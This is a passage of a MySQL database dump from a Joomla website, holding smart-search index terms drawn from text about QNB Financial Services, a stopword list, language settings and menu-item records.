stock',0,1,1.5,'A23232',1,'en'),(52588,'access to stocks','access to stocks',0,1,1.5333,'A23232',1,'en'),(52589,'also provides','also provides',0,1,1.4333,'A4216132',1,'en'),(52590,'also provides access','also provides access',0,1,1.6667,'A4216132',1,'en'),(52591,'analysis','analysi',0,0,0.5333,'A542',1,'en'),(52592,'analysis enabling','analysi enabling',0,1,1.5667,'A54251452',1,'en'),(52593,'analysis enabling you','analysi enabling you',0,1,1.7,'A54251452',1,'en'),(52594,'and analysis','and analysis',0,1,1.4,'A53542',1,'en'),(52595,'and analysis enabling','and analysis enabling',0,1,1.7,'A5354251452',1,'en'),(52596,'and corporate','and corporate',0,1,1.4333,'A5326163',1,'en'),(52597,'and corporate clients','and corporate clients',0,1,1.7,'A532616324532',1,'en'),(52598,'and institutional','and institutional',0,1,1.5667,'A5352354',1,'en'),(52599,'and institutional clients','and institutional clients',0,1,1.8333,'A535235424532',1,'en'),(52600,'and u','and u',0,1,1.1667,'A530',1,'en'),(52601,'and u s','and u s',0,1,1.2333,'A532',1,'en'),(52602,'baseline','baselin',0,0,0.5333,'B245',1,'en'),(52603,'baseline color','baselin color',0,1,1.4667,'B245246',1,'en'),(52604,'baseline color 394040','baselin color 394040',0,1,1.7,'B245246',1,'en'),(52605,'both individual','both individual',0,1,1.5,'B353134',1,'en'),(52606,'both individual and','both individual and',0,1,1.6333,'B35313453',1,'en'),(52607,'brokerage unit','brokerag unit',0,1,1.4667,'B626253',1,'en'),(52608,'brokerage unit in','brokerag unit in',0,1,1.5667,'B6262535',1,'en'),(52609,'clients access','client access',0,1,1.4667,'C4532',1,'en'),(52610,'clients access to','client access to',0,1,1.5667,'C45323',1,'en'),(52611,'clients qnb','client qnb',0,1,1.3667,'C453251',1,'en'),(52612,'clients qnb fs','client qnb fs',0,1,1.4667,'C4532512',1,'en'),(52613,'color 394040','color 394040',0,1,1.4,'C460',1,'en'),(52614,'color 394040 it','color 394040 it',0,1,1.5,'C463',1,'en'),(52615,'corporate clients','corpor clients',0,1,1.5667,'C616324532',1,'en'),(52616,'corporate clients qnb','corpor clients qnb',0,1,1.7,'C61632453251',1,'en'),(52617,'decisions','decis',0,0,0.6,'D252',1,'en'),(52618,'domestic','domest',0,0,0.5333,'D5232',1,'en'),(52619,'domestic institutional','domest institutional',0,1,1.7333,'D523252354',1,'en'),(52620,'domestic institutional investors','domest institutional investors',0,1,2,'D523252354512362',1,'en'),(52621,'enabling','enabl',0,0,0.5333,'E51452',1,'en'),(52622,'enabling you','enabl you',0,1,1.4,'E51452',1,'en'),(52623,'enabling you to','enabl you to',0,1,1.5,'E514523',1,'en'),(52624,'established in the','establish in the',0,1,1.6,'E23142353',1,'en'),(52625,'european','european',0,0,0.5333,'E615',1,'en'),(52626,'european and','european and',0,1,1.4,'E6153',1,'en'),(52627,'european and u','european and u',0,1,1.4667,'E6153',1,'en'),(52628,'financial services qnb','financi services qnb',0,1,1.7333,'F524261251',1,'en'),(52629,'financial services to','financi services to',0,1,1.7,'F52426123',1,'en'),(52630,'foreign','foreign',0,0,0.4667,'F625',1,'en'),(52631,'foreign institutional','foreign institutional',0,1,1.7,'F6252354',1,'en'),(52632,'foreign institutional investors','foreign institutional investors',0,1,2,'F6252354512362',1,'en'),(52633,'fs','fs',0,0,0.1333,'F200',1,'en'),(52634,'fs launched','fs launched',0,1,1.3667,'F24523',1,'en'),(52635,'fs launched its','fs launched its',0,1,1.5,'F245232',1,'en'),(52636,'fs offers','fs offers',0,1,1.3,'F2162',1,'en'),(52637,'fs offers world-class','fs offers world-class',0,1,1.7,'F2162643242',1,'en'),(52638,'fs was','fs was',0,1,1.2,'F200',1,'en'),(52639,'fs was established','fs was established',0,1,1.6,'F231423',1,'en'),(52640,'funds domestic','fund domestic',0,1,1.4667,'F53235232',1,'en'),(52641,'funds domestic institutional','fund domestic institutional',0,1,1.9333,'F5323523252354',1,'en'),(52642,'group offering','group offering',0,1,1.4667,'G61652',1,'en'),(52643,'group offering a','group offering a',0,1,1.5333,'G61652',1,'en'),(52644,'high net','high net',0,1,1.2667,'H253',1,'en'),(52645,'high net worth','high net worth',0,1,1.4667,'H25363',1,'en'),(52646,'in may','in may',0,1,1.2,'I500',1,'en'),(52647,'in may 2011','in may 2011',0,1,1.3667,'I500',1,'en'),(52648,'in the last','in the last',0,1,1.3667,'I53423',1,'en'),(52649,'individual','individu',0,0,0.6667,'I53134',1,'en'),(52650,'individual and','individu and',0,1,1.4667,'I5313453',1,'en'),(52651,'individual and institutional','individu and institutional',0,1,1.9333,'I531345352354',1,'en'),(52652,'individuals retail','individu retail',0,1,1.6,'I531342634',1,'en'),(52653,'individuals retail and','individu retail and',0,1,1.7333,'I53134263453',1,'en'),(52654,'institutional','institut',0,0,0.8667,'I52354',1,'en'),(52655,'institutional clients','institut clients',0,1,1.7,'I5235424532',1,'en'),(52656,'institutional clients access','institut clients access',0,1,1.9333,'I5235424532',1,'en'),(52657,'institutional investors','institut investors',0,1,1.7667,'I52354512362',1,'en'),(52658,'institutional investors high','institut investors high',0,1,1.9333,'I52354512362',1,'en'),(52659,'institutional investors mutual','institut investors mutual',0,1,2,'I52354512362534',1,'en'),(52660,'investment decisions','invest decisions',0,1,1.6667,'I512353252',1,'en'),(52661,'investors','investor',0,0,0.6,'I512362',1,'en'),(52662,'investors high','investor high',0,1,1.4667,'I512362',1,'en'),(52663,'investors high net','investor high net',0,1,1.6,'I51236253',1,'en'),(52664,'investors mutual','investor mutual',0,1,1.5333,'I512362534',1,'en'),(52665,'investors mutual funds','investor mutual funds',0,1,1.7333,'I5123625341532',1,'en'),(52666,'it also','it also',0,1,1.2333,'I342',1,'en'),(52667,'it also provides','it also provides',0,1,1.5333,'I34216132',1,'en'),(52668,'its brokerage','it brokerage',0,1,1.4333,'I3216262',1,'en'),(52669,'its brokerage unit','it brokerage unit',0,1,1.6,'I321626253',1,'en'),(52670,'last quarter','last quarter',0,1,1.4,'L232636',1,'en'),(52671,'last quarter of','last quarter of',0,1,1.5,'L2326361',1,'en'),(52672,'launched its','launch its',0,1,1.4,'L5232',1,'en'),(52673,'launched its brokerage','launch its brokerage',0,1,1.7333,'L523216262',1,'en'),(52674,'listed on','list on',0,1,1.3,'L235',1,'en'),(52675,'listed on the','list on the',0,1,1.4333,'L2353',1,'en'),(52676,'make sound','make sound',0,1,1.3333,'M253',1,'en'),(52677,'make sound investment','make sound investment',0,1,1.7,'M253512353',1,'en'),(52678,'markets moreover','market moreover',0,1,1.5333,'M62325616',1,'en'),(52679,'markets moreover qnb','market moreover qnb',0,1,1.6667,'M62325616251',1,'en'),(52680,'may 2011','mai 2011',0,1,1.2667,'M000',1,'en'),(52681,'may 2011 providing','mai 2011 providing',0,1,1.6,'M161352',1,'en'),(52682,'moreover','moreov',0,0,0.5333,'M616',1,'en'),(52683,'moreover qnb','moreov qnb',0,1,1.4,'M616251',1,'en'),(52684,'moreover qnb fs','moreov qnb fs',0,1,1.5,'M6162512',1,'en'),(52685,'mutual','mutual',0,0,0.4,'M340',1,'en'),(52686,'mutual funds','mutual funds',0,1,1.4,'M341532',1,'en'),(52687,'mutual funds domestic','mutual funds domestic',0,1,1.7,'M34153235232',1,'en'),(52688,'net worth','net worth',0,1,1.3,'N363',1,'en'),(52689,'net worth individuals','net worth individuals',0,1,1.7,'N363531342',1,'en'),(52690,'of 2010','of 2010',0,1,1.2333,'O100',1,'en'),(52691,'of 2010 as','of 2010 as',0,1,1.3333,'O120',1,'en'),(52692,'of financial services','of financial services',0,1,1.7,'O15242612',1,'en'),(52693,'of the qnb','of the qnb',0,1,1.3333,'O13251',1,'en'),(52694,'offering a','offer a',0,1,1.3333,'O1652',1,'en'),(52695,'offering a range','offer a range',0,1,1.5333,'O1652652',1,'en'),(52696,'offers','offer',0,0,0.4,'O162',1,'en'),(52697,'offers world-class','offer world-class',0,1,1.6,'O162643242',1,'en'),(52698,'offers world-class research','offer world-class research',0,1,1.9,'O1626432426262',1,'en'),(52699,'on european','on european',0,1,1.3667,'O5615',1,'en'),(52700,'on european and','on european and',0,1,1.5,'O56153',1,'en'),(52701,'on the qatar','on the qatar',0,1,1.4,'O53236',1,'en'),(52702,'provides access','provid access',0,1,1.5,'P6132',1,'en'),(52703,'provides access to','provid access to',0,1,1.6,'P61323',1,'en'),(52704,'providing both','provid both',0,1,1.4667,'P6135213',1,'en'),(52705,'providing both individual','provid both individual',0,1,1.8333,'P613521353134',1,'en'),(52706,'qatar securities','qatar securities',0,1,1.5333,'Q362632',1,'en'),(52707,'qatar securities markets','qatar securities markets',0,1,1.8,'Q36263256232',1,'en'),(52708,'qnb','qnb',0,0,0.2,'Q510',1,'en'),(52709,'qnb financial','qnb financial',0,1,1.4333,'Q51524',1,'en'),(52710,'qnb financial services','qnb financial services',0,1,1.7333,'Q515242612',1,'en'),(52711,'qnb fs','qnb fs',0,1,1.2,'Q512',1,'en'),(52712,'qnb fs launched','qnb fs launched',0,1,1.5,'Q5124523',1,'en'),(52713,'qnb fs offers','qnb fs offers',0,1,1.4333,'Q512162',1,'en'),(52714,'qnb fs was','qnb fs was',0,1,1.3333,'Q512',1,'en'),(52715,'qnb group','qnb group',0,1,1.3,'Q51261',1,'en'),(52716,'qnb group offering','qnb group offering',0,1,1.6,'Q51261652',1,'en'),(52717,'quarter of','quarter of',0,1,1.3333,'Q6361',1,'en'),(52718,'quarter of 2010','quarter of 2010',0,1,1.5,'Q6361',1,'en'),(52719,'range of financial','rang of financial',0,1,1.6,'R521524',1,'en'),(52720,'research and','research and',0,1,1.4,'R26253',1,'en'),(52721,'research and analysis','research and analysis',0,1,1.7,'R26253542',1,'en'),(52722,'retail and','retail and',0,1,1.3333,'R3453',1,'en'),(52723,'retail and corporate','retail and corporate',0,1,1.6667,'R345326163',1,'en'),(52724,'s markets','s markets',0,1,1.3,'S56232',1,'en'),(52725,'s markets moreover','s markets moreover',0,1,1.6,'S562325616',1,'en'),(52726,'securities markets','secur markets',0,1,1.6,'S63256232',1,'en'),(52727,'services qnb','servic qnb',0,1,1.4,'S61251',1,'en'),(52728,'services qnb financial','servic qnb financial',0,1,1.7333,'S61251524',1,'en'),(52729,'services qnb fs','servic qnb fs',0,1,1.5,'S612512',1,'en'),(52730,'services to foreign','servic to foreign',0,1,1.6333,'S61231625',1,'en'),(52731,'sound investment','sound investment',0,1,1.5333,'S53512353',1,'en'),(52732,'sound investment decisions','sound investment decisions',0,1,1.8667,'S53512353252',1,'en'),(52733,'stock trading','stock trading',0,1,1.4333,'S3236352',1,'en'),(52734,'stock trading on','stock trading on',0,1,1.5333,'S32363525',1,'en'),(52735,'stocks','stock',0,0,0.4,'S320',1,'en'),(52736,'stocks listed','stock listed',0,1,1.4333,'S32423',1,'en'),(52737,'stocks listed on','stock listed on',0,1,1.5333,'S324235',1,'en'),(52738,'the last quarter','the last quarter',0,1,1.5333,'T4232636',1,'en'),(52739,'the qatar','the qatar',0,1,1.3,'T236',1,'en'),(52740,'the qatar securities','the qatar securities',0,1,1.6667,'T2362632',1,'en'),(52741,'the qnb','the qnb',0,1,1.2333,'T251',1,'en'),(52742,'the qnb group','the qnb group',0,1,1.4333,'T251261',1,'en'),(52743,'to foreign','to foreign',0,1,1.3333,'T1625',1,'en'),(52744,'to foreign institutional','to foreign institutional',0,1,1.8,'T16252354',1,'en'),(52745,'to make sound','to make sound',0,1,1.4333,'T5253',1,'en'),(52746,'to stock','to stock',0,1,1.2667,'T232',1,'en'),(52747,'to stock trading','to stock trading',0,1,1.5333,'T23236352',1,'en'),(52748,'to stocks','to stocks',0,1,1.3,'T232',1,'en'),(52749,'to stocks listed','to stocks listed',0,1,1.5333,'T232423',1,'en'),(52750,'trading on','trade on',0,1,1.3333,'T63525',1,'en'),(52751,'trading on european','trade on european',0,1,1.6333,'T63525615',1,'en'),(52752,'u s markets','u s markets',0,1,1.3667,'U256232',1,'en'),(52753,'unit','unit',0,0,0.2667,'U530',1,'en'),(52754,'unit in','unit in',0,1,1.2333,'U535',1,'en'),(52755,'unit in may','unit in may',0,1,1.3667,'U535',1,'en'),(52756,'was established','wa established',0,1,1.5,'W231423',1,'en'),(52757,'was established in','wa established in',0,1,1.6,'W2314235',1,'en'),(52758,'world-class','world-class',0,0,0.7333,'W643242',1,'en'),(52759,'world-class research','world-class research',0,1,1.6667,'W6432426262',1,'en'),(52760,'world-class research and','world-class research and',0,1,1.8,'W643242626253',1,'en'),(52761,'worth individuals','worth individuals',0,1,1.5667,'W63531342',1,'en'),(52762,'worth individuals retail','worth individuals retail',0,1,1.8,'W63531342634',1,'en'),(52763,'you to make','you to make',0,1,1.3667,'Y352',1,'en'); /*!40000 ALTER TABLE `fit_finder_terms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_terms_common` -- DROP TABLE IF EXISTS `fit_finder_terms_common`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_terms_common` ( `term` varchar(75) NOT NULL, `language` varchar(3) NOT NULL, KEY `idx_word_lang` (`term`,`language`), KEY `idx_lang` (`language`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_terms_common` -- LOCK TABLES `fit_finder_terms_common` WRITE; /*!40000 ALTER TABLE `fit_finder_terms_common` DISABLE KEYS */; INSERT INTO `fit_finder_terms_common` VALUES ('a','en'),('a','en'),('about','en'),('about','en'),('after','en'),('after','en'),('ago','en'),('ago','en'),('all','en'),('all','en'),('am','en'),('am','en'),('an','en'),('an','en'),('and','en'),('and','en'),('ani','en'),('ani','en'),('any','en'),('any','en'),('are','en'),('are','en'),('aren\'t','en'),('aren\'t','en'),('as','en'),('as','en'),('at','en'),('at','en'),('be','en'),('be','en'),('but','en'),('but','en'),('by','en'),('by','en'),('for','en'),('for','en'),('from','en'),('from','en'),('get','en'),('get','en'),('go','en'),('go','en'),('how','en'),('how','en'),('if','en'),('if','en'),('in','en'),('in','en'),('into','en'),('into','en'),('is','en'),('is','en'),('isn\'t','en'),('isn\'t','en'),('it','en'),('it','en'),('its','en'),('its','en'),('me','en'),('me','en'),('more','en'),('more','en'),('most','en'),('most','en'),('must','en'),('must','en'),('my','en'),('my','en'),('new','en'),('new','en'),('no','en'),('no','en'),('none','en'),('none','en'),('not','en'),('not','en'),('noth','en'),('noth','en'),('nothing','en'),('nothing','en'),('of','en'),('of','en'),('off','en'),('off','en'),('often','en'),('often','en'),('old','en'),('old','en'),('on','en'),('on','en'),('onc','en'),('onc','en'),('once','en'),('once','en'),('onli','en'),('onli','en'),('only','en'),('only','en'),('or','en'),('or','en'),('other','en'),('other','en'),('our','en'),('our','en'),('ours','en'),('ours','en'),('out','en'),('out','en'),('over','en'),('over','en'),('page','en'),('page','en'),('she','en'),('she','en'),('should','en'),('should','en'),('small','en'),('small','en'),('so','en'),('so','en'),('some','en'),('some','en'),('than','en'),('than','en'),('thank','en'),('thank','en'),('that','en'),('that','en'),('the','en'),('the','en'),('their','en'),('their','en'),('theirs','en'),('theirs','en'),('them','en'),('them','en'),('then','en'),('then','en'),('there','en'),('there','en'),('these','en'),('these','en'),('they','en'),('they','en'),('this','en'),('this','en'),('those','en'),('those','en'),('thus','en'),('thus','en'),('time','en'),('time','en'),('times','en'),('times','en'),('to','en'),('to','en'),('too','en'),('too','en'),('true','en'),('true','en'),('under','en'),('under','en'),('until','en'),('until','en'),('up','en'),('up','en'),('upon','en'),('upon','en'),('use','en'),('use','en'),('user','en'),('user','en'),('users','en'),('users','en'),('veri','en'),('veri','en'),('version','en'),('version','en'),('very','en'),('very','en'),('via','en'),('via','en'),('want','en'),('want','en'),('was','en'),('was','en'),('way','en'),('way','en'),('were','en'),('were','en'),('what','en'),('what','en'),('when','en'),('when','en'),('where','en'),('where','en'),('whi','en'),('whi','en'),('which','en'),('which','en'),('who','en'),('who','en'),('whom','en'),('whom','en'),('whose','en'),('whose','en'),('why','en'),('why','en'),('wide','en'),('wide','en'),('will','en'),('will','en'),('with','en'),('with','en'),('within','en'),('within','en'),('without','en'),('without','en'),('would','en'),('would','en'),('yes','en'),('yes','en'),('yet','en'),('yet','en'),('you','en'),('you','en'),('your','en'),('your','en'),('yours','en'),('yours','en'); /*!40000 ALTER TABLE `fit_finder_terms_common` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_tokens` -- DROP TABLE IF EXISTS `fit_finder_tokens`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_tokens` ( `term` varchar(75) NOT NULL, `stem` varchar(75) NOT NULL, `common` tinyint(1) unsigned NOT NULL default '0', `phrase` tinyint(1) unsigned NOT NULL default '0', `weight` float unsigned NOT NULL default '1', `context` tinyint(1) unsigned NOT NULL default '2', `language` char(3) NOT NULL default '', KEY `idx_word` (`term`), KEY `idx_context` (`context`) ) ENGINE=MEMORY DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_tokens` -- LOCK TABLES `fit_finder_tokens` WRITE; /*!40000 ALTER TABLE `fit_finder_tokens` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_finder_tokens` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_tokens_aggregate` -- DROP TABLE IF EXISTS `fit_finder_tokens_aggregate`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_tokens_aggregate` ( `term_id` int(10) unsigned NOT NULL, `map_suffix` char(1) NOT NULL, `term` varchar(75) NOT NULL, `stem` varchar(75) NOT NULL, `common` tinyint(1) unsigned NOT NULL default '0', `phrase` tinyint(1) unsigned NOT NULL default '0', `term_weight` float unsigned NOT NULL, `context` tinyint(1) unsigned NOT NULL default '2', `context_weight` float unsigned NOT NULL, `total_weight` float unsigned NOT NULL, `language` char(3) NOT NULL default '', KEY `token` (`term`), KEY `keyword_id` (`term_id`) ) ENGINE=MEMORY DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_tokens_aggregate` -- LOCK TABLES `fit_finder_tokens_aggregate` WRITE; /*!40000 ALTER TABLE `fit_finder_tokens_aggregate` DISABLE KEYS */; /*!40000 ALTER TABLE `fit_finder_tokens_aggregate` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_finder_types` -- DROP TABLE IF EXISTS `fit_finder_types`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_finder_types` ( `id` int(10) unsigned NOT NULL auto_increment, `title` varchar(100) NOT NULL, `mime` varchar(100) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `title` (`title`) ) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_finder_types` -- LOCK TABLES `fit_finder_types` WRITE; /*!40000 ALTER TABLE `fit_finder_types` DISABLE KEYS */; INSERT INTO `fit_finder_types` VALUES (1,'Category',''),(2,'Contact',''),(3,'Article',''),(4,'News Feed',''),(5,'Web Link',''),(6,'Tag',''); /*!40000 ALTER TABLE `fit_finder_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_languages` -- DROP TABLE IF EXISTS `fit_languages`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_languages` ( `lang_id` int(11) unsigned NOT NULL auto_increment, `lang_code` char(7) NOT NULL, `title` varchar(50) NOT NULL, `title_native` varchar(50) NOT NULL, `sef` varchar(50) NOT NULL, `image` varchar(50) NOT NULL, `description` varchar(512) NOT NULL, `metakey` text NOT NULL, `metadesc` text NOT NULL, `sitename` varchar(1024) NOT NULL default '', `published` int(11) NOT NULL default '0', `access` int(10) unsigned NOT NULL default '0', `ordering` int(11) NOT NULL default '0', PRIMARY KEY (`lang_id`), UNIQUE KEY `idx_sef` (`sef`), UNIQUE KEY `idx_image` (`image`), UNIQUE KEY `idx_langcode` (`lang_code`), KEY `idx_ordering` (`ordering`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_languages` -- LOCK TABLES `fit_languages` WRITE; /*!40000 ALTER TABLE `fit_languages` DISABLE KEYS */; INSERT INTO `fit_languages` VALUES (1,'en-GB','English (UK)','English (UK)','en','en','','','','',1,0,0); /*!40000 ALTER TABLE `fit_languages` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `fit_menu` -- DROP TABLE IF EXISTS `fit_menu`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `fit_menu` ( `id` int(11) NOT NULL auto_increment, `menutype` varchar(24) NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype', `title` varchar(255) NOT NULL COMMENT 'The display title of the menu item.', `alias` varchar(255) character set utf8 collate utf8_bin NOT NULL COMMENT 'The SEF alias of the menu item.', `note` varchar(255) NOT NULL default '', `path` varchar(1024) NOT NULL COMMENT 'The computed path of the menu item based on the alias field.', `link` varchar(1024) NOT NULL COMMENT 'The actually link the menu item refers to.', `type` varchar(16) NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator', `published` tinyint(4) NOT NULL default '0' COMMENT 'The published state of the menu link.', `parent_id` int(10) unsigned NOT NULL default '1' COMMENT 'The parent menu item in the menu tree.', `level` int(10) unsigned NOT NULL default '0' COMMENT 'The relative level in the tree.', `component_id` int(10) unsigned NOT NULL default '0' COMMENT 'FK to #__extensions.id', `checked_out` int(10) unsigned NOT NULL default '0' COMMENT 'FK to #__users.id', `checked_out_time` timestamp NOT NULL default '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.', `browserNav` tinyint(4) NOT NULL default '0' COMMENT 'The click behaviour of the link.', `access` int(10) unsigned default NULL, `img` varchar(255) NOT NULL COMMENT 'The image of the menu item.', `template_style_id` int(10) unsigned NOT NULL default '0', `params` text NOT NULL COMMENT 'JSON encoded data for the menu item.', `lft` int(11) NOT NULL default '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL default '0' COMMENT 'Nested set rgt.', `home` tinyint(3) unsigned NOT NULL default '0' COMMENT 'Indicates if this menu item is the home or default page.', `language` char(7) NOT NULL default '', `client_id` tinyint(4) NOT NULL default '0', PRIMARY KEY (`id`), UNIQUE KEY `idx_client_id_parent_id_alias_language` (`client_id`,`parent_id`,`alias`,`language`), KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`), KEY `idx_menutype` (`menutype`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_path` (`path`(255)), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=694 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `fit_menu` -- LOCK TABLES `fit_menu` WRITE; /*!40000 ALTER TABLE `fit_menu` DISABLE KEYS */; INSERT INTO `fit_menu` VALUES (1,'','Menu_Item_Root','root','','','','',1,0,0,0,0,'0000-00-00 00:00:00',0,0,'',0,'',0,237,0,'*',0),(2,'menu','com_banners','Banners','','Banners','index.php?option=com_banners','component',0,1,1,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',149,158,0,'*',1),(3,'menu','com_banners','Banners','','Banners/Banners','index.php?option=com_banners','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',150,151,0,'*',1),(4,'menu','com_banners_categories','Categories','','Banners/Categories','index.php?option=com_categories&extension=com_banners','component',0,2,2,6,0,'0000-00-00 00:00:00',0,0,'class:banners-cat',0,'',152,153,0,'*',1),(5,'menu','com_banners_clients','Clients','','Banners/Clients','index.php?option=com_banners&view=clients','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-clients',0,'',154,155,0,'*',1),(6,'menu','com_banners_tracks','Tracks','','Banners/Tracks','index.php?option=com_banners&view=tracks','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-tracks',0,'',156,157,0,'*',1),(7,'menu','com_contact','Contacts','','Contacts','index.php?option=com_contact','component',0,1,1,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',159,164,0,'*',1),(8,'menu','com_contact','Contacts','','Contacts/Contacts','index.php?option=com_contact','component',0,7,2,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',160,161,0,'*',1),(9,'menu','com_contact_categories','Categories','','Contacts/Categories','index.php?option=com_categories&extension=com_contact','component',0,7,2,6,0,'0000-00-00 00:00:00',0,0,'class:contact-cat',0,'',162,163,0,'*',1),(10,'menu','com_messages','Messaging','','Messaging','index.php?option=com_messages','component',0,1,1,15,0,'0000-00-00 00:00:00',0,0,'class:messages',0,'',165,170,0,'*',1),(11,'menu','com_messages_add','New Private Message','','Messaging/New Private Message','index.php?option=com_messages&task=message.add','component',0,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-add',0,'',166,167,0,'*',1),(12,'menu','com_messages_read','Read Private Message','','Messaging/Read Private Message','index.php?option=com_messages','component',0,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-read',0,'',168,169,0,'*',1),(13,'menu','com_newsfeeds','News Feeds','','News Feeds','index.php?option=com_newsfeeds','component',0,1,1,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',171,176,0,'*',1),(14,'menu','com_newsfeeds_feeds','Feeds','','News Feeds/Feeds','index.php?option=com_newsfeeds','component',0,13,2,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',172,173,0,'*',1),(15,'menu','com_newsfeeds_categories','Categories','','News Feeds/Categories','index.php?option=com_categories&extension=com_newsfeeds','component',0,13,2,6,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds-cat',0,'',174,175,0,'*',1),(16,'menu','com_redirect','Redirect','','Redirect','index.php?option=com_redirect','component',0,1,1,24,0,'0000-00-00 00:00:00',0,0,'class:redirect',0,'',187,188,0,'*',1),(17,'menu','com_search','Search','','Search','index.php?option=com_search','component',0,1,1,19,0,'0000-00-00 00:00:00',0,0,'class:search',0,'',177,178,0,'*',1),(18,'menu','com_weblinks','Weblinks','','Weblinks','index.php?option=com_weblinks','component',0,1,1,21,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',179,184,0,'*',1),(19,'menu','com_weblinks_links','Links','','Weblinks/Links','index.php?option=com_weblinks','component',0,18,2,21,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',180,181,0,'*',1),(20,'menu','com_weblinks_categories','Categories','','Weblinks/Categories','index.php?option=com_categories&extension=com_weblinks','component',0,18,2,6,0,'0000-00-00 00:00:00',0,0,'class:weblinks-cat',0,'',182,183,0,'*',1),(21,'menu','com_finder','Smart Search','','Smart Search','index.php?option=com_finder','component',0,1,1,27,0,'0000-00-00 00:00:00',0,0,'class:finder',0,'',185,186,0,'*',1),(207,'top','Joomla.org','joomlaorg','','joomlaorg','http://joomla.org','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\"}',193,194,0,'*',0),(435,'mainmenu','Home','homepage','','homepage','index.php?option=com_content&view=featured','component',1,1,1,22,736,'2015-03-12 12:59:14',0,1,'',0,'{\"featured_categories\":[\"\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"0\",\"num_columns\":\"1\",\"num_links\":\"0\",\"multi_column_order\":\"1\",\"orderby_pri\":\"\",\"orderby_sec\":\"rdate\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_pagination_results\":\"\",\"show_title\":\"1\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"\",\"show_readmore\":\"1\",\"show_readmore_title\":\"\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"mega_showtitle\":\"1\",\"mega_desc\":\"\",\"mega_icon\":\"\",\"mega_class\":\"\",\"mega_cols\":\"1\",\"mega_width\":\"\",\"mega_colw\":\"\",\"mega_colxw\":\"\",\"mega_group\":\"0\",\"mega_subcontent\":\"0\"}',1,2,1,'*',0),(444,'top','Sample Sites','sample-sites-2','','sample-sites-2','index.php?Itemid=','alias',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"aliasoptions\":\"238\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\"}',191,192,0,'*',0),(464,'top','Home','home','','home','index.php?Itemid=','alias',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"aliasoptions\":\"435\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\"}',189,190,0,'*',0),(466,'mainmenu','Typography','typography','','typography','index.php?option=com_content&view=article&id=74','component',-2,1,1,22,0,'0000-00-00 